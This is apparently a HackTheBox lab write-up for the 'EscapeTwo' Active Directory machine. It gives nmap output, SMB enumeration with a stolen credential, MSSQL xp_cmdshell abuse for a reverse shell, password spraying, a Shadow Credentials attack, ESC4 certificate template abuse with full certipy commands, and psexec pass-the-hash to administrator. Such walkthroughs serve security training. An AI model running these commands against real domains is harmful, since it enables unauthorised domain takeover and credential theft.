Setup
mkdir -p ~/ctf/HackTheBox/escapetwo/scans; cd ~/ctf/HackTheBox/escapetwo
IP Address: 10.10.11.51
echo "10.10.11.51 escapetwo.htb" | sudo tee -a /etc/hosts
10.10.11.51 escapetwo.htb
Enumeration
nmap -sC -sV -Pn -p- escapetwo.htb -oN scans/nmap -vv
nmap -sC -sV -p- -T5 -vv --min-rate 2500 -oN scans/nmap_2 escapetwo.htb
# nmap findings
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2025-04-28 07:17:36Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Issuer: commonName=sequel-DC01-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-27T21:35:48
| Not valid after: 2026-04-27T21:35:48
| MD5: 2346:52c8:2638:d62f:3774:8ca0:c934:df6a
| SHA-1: 0392:dac1:1784:2df8:1f92:1efa:c143:f3d7:4efd:52c1
|_ssl-date: 2025-04-28T07:19:11+00:00; -19m58s from scanner time.
445/tcp open microsoft-ds? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Issuer: commonName=sequel-DC01-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-27T21:35:48
| Not valid after: 2026-04-27T21:35:48
| MD5: 2346:52c8:2638:d62f:3774:8ca0:c934:df6a
| SHA-1: 0392:dac1:1784:2df8:1f92:1efa:c143:f3d7:4efd:52c1
|_ssl-date: 2025-04-28T07:19:11+00:00; -19m58s from scanner time.
1433/tcp open ms-sql-s syn-ack Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-27T13:41:16
| Not valid after: 2055-04-27T13:41:16
| MD5: 4fcb:5a4e:53c7:ee55:1d4c:7a61:9688:9040
| SHA-1: 3be5:b199:6a61:a7d8:e08e:92a0:0d5c:1ffb:eb3c:86f4
| ms-sql-info:
| 10.10.11.51:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.10.11.51:1433:
| Target_Name: SEQUEL
| NetBIOS_Domain_Name: SEQUEL
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: DC01.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
|_ssl-date: 2025-04-28T07:19:14+00:00; -19m58s from scanner time.
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-28T07:19:11+00:00; -19m58s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Issuer: commonName=sequel-DC01-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-27T21:35:48
| Not valid after: 2026-04-27T21:35:48
| MD5: 2346:52c8:2638:d62f:3774:8ca0:c934:df6a
| SHA-1: 0392:dac1:1784:2df8:1f92:1efa:c143:f3d7:4efd:52c1
3269/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-28T07:19:11+00:00; -19m58s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Issuer: commonName=sequel-DC01-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-27T21:35:48
| Not valid after: 2026-04-27T21:35:48
| MD5: 2346:52c8:2638:d62f:3774:8ca0:c934:df6a
| SHA-1: 0392:dac1:1784:2df8:1f92:1efa:c143:f3d7:4efd:52c1
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack .NET Message Framing
47001/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49665/tcp open msrpc syn-ack Microsoft Windows RPC
49666/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49689/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49690/tcp open msrpc syn-ack Microsoft Windows RPC
49693/tcp open msrpc syn-ack Microsoft Windows RPC
49706/tcp open msrpc syn-ack Microsoft Windows RPC
49722/tcp open msrpc syn-ack Microsoft Windows RPC
49743/tcp open msrpc syn-ack Microsoft Windows RPC
49811/tcp open msrpc syn-ack Microsoft Windows RPC
62060/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: -19m58s, deviation: 0s, median: -19m58s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 62012/tcp): CLEAN (Timeout)
| Check 2 (port 18505/tcp): CLEAN (Timeout)
| Check 3 (port 20179/udp): CLEAN (Timeout)
| Check 4 (port 46639/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2025-04-28T07:18:33
|_ start_date: N/A
cme smb escapetwo.htb -u 'rose' -p 'KxEPkKe6R8su' --users
# Enumerated users
ca_svc
rose
sql_svc
oscar
ryan
michael
krbtgt
Guest
Administrator
SMB Shares:
SMB 10.10.11.51 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.51 445 DC01 [+] sequel.htb\rose:KxE****************
SMB 10.10.11.51 445 DC01 [*] Enumerated shares
SMB 10.10.11.51 445 DC01 Share Permissions Remark
SMB 10.10.11.51 445 DC01 ----- ----------- ------
SMB 10.10.11.51 445 DC01 Accounting Department READ
SMB 10.10.11.51 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.51 445 DC01 C$ Default share
SMB 10.10.11.51 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.51 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.51 445 DC01 SYSVOL READ Logon server share
SMB 10.10.11.51 445 DC01 Users READ
![[Pasted_image_20250428161401.png]](/images/post/Pasted_image_20250428161401.png)
![[Pasted_image_20250428161107.png]](/images/post/Pasted_image_20250428161107.png)
When tried opening these files in excel , there was an error showing File corrupt which led me to check the file type and found out these are Zip files
![[Pasted_image_20250429103940.png]](/images/post/Pasted_image_20250429103940.png)
Unzipping these files, found a xml file with some credential table:
![[Pasted_image_20250429104109.png]](/images/post/Pasted_image_20250429104109.png)
Using these password found two more credentials:
oscar:86****************
sa:MS****************
Using these found out that sa is a MSSQL admin
![[Pasted_image_20250429104318.png]](/images/post/Pasted_image_20250429104318.png)
Using this we use mssqlclient to enable enable_xp_cmdshell and get a reverse powershell:
![[Pasted_image_20250429104429.png]](/images/post/Pasted_image_20250429104429.png)
![[Pasted_image_20250429111420.png]](/images/post/Pasted_image_20250429111420.png)
in the SQL Configuration file found a password:
![[Pasted_image_20250429105300.png]](/images/post/Pasted_image_20250429105300.png)
using password spray found this same password is used by user ryan as well:
![[Pasted_image_20250429105338.png]](/images/post/Pasted_image_20250429105338.png)
using cme to enumerate service we find winrm to be enabled:
![[Pasted_image_20250429111745.png]](/images/post/Pasted_image_20250429111745.png)
![[Pasted_image_20250429111826.png]](/images/post/Pasted_image_20250429111826.png)
User Flag
Location: C:\Users\ryan\Desktop\user.txt | Flag:1a****************
Privilege Escalation
Using the obtained credentials for Ryan we run rusthound to collect info:
![[Pasted_image_20250429145646.png]](/images/post/Pasted_image_20250429145646.png)
We also try Kerberoasting but the hashes couldn’t be cracked using rockyou:
![[Pasted_image_20250429145815.png]](/images/post/Pasted_image_20250429145815.png)
Then in bloodhound we find:
![[Pasted_image_20250429150000.png]](/images/post/Pasted_image_20250429150000.png)
Shadow Credentials attack: A Shadow Credential Attack is a technique used by attackers to gain persistence and elevate privileges in a Windows Active Directory (AD) environment without creating obvious traces like new user accounts or group memberships. Instead, it abuses legitimate features—specifically Key Credential Link (KCL) attributes used in certificate-based authentication (e.g., PKINIT for Kerberos or Windows Hello for Business).
Pywhisker was used for this attack:
![[Pasted_image_20250429152711.png]](/images/post/Pasted_image_20250429152711.png)
![[Pasted_image_20250429152728.png]](/images/post/Pasted_image_20250429152728.png)
ca_svc:3b1****************
To check for any reusage of password we perform a hash spray against all usernames:
![[Pasted_image_20250429152951.png]](/images/post/Pasted_image_20250429152951.png)
As the username ca_svc is for Certificate Publishers we use certipy to find vulnerabilities:
![[Pasted_image_20250429161625.png]](/images/post/Pasted_image_20250429161625.png)
Using ADCS Exploitation Part 1: Common Attacks we can exploit the ESC4:
certipy template -u ca_svc@sequel.htb -template DunderMifflinAuthentication -save-old -hashes 3b**************** -dc-ip 10.10.11.51
![[Pasted_image_20250429162715.png]](/images/post/Pasted_image_20250429162715.png)
certipy req -username 'ca_svc@sequel.htb' -hashes 3b**************** -ca sequel-DC01-CA -target DC01.sequel.htb -dc-ip 10.10.11.51 -template DunderMifflinAuthentication -upn administrator@sequel.htb
![[Pasted_image_20250429162735.png]](/images/post/Pasted_image_20250429162735.png)
certipy auth -pfx administrator.pfx -dc-ip 10.10.11.51
![[Pasted_image_20250429163039.png]](/images/post/Pasted_image_20250429163039.png)
Using Psexec we get a shell impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:7a8d4**************** -target-ip 10.10.11.51 administrator@sequel.htb
![[Pasted_image_20250429163513.png]](/images/post/Pasted_image_20250429163513.png)
Root Flag
Location: c:\Users\Administrator\Desktop\root.txt | Flag: 85b****************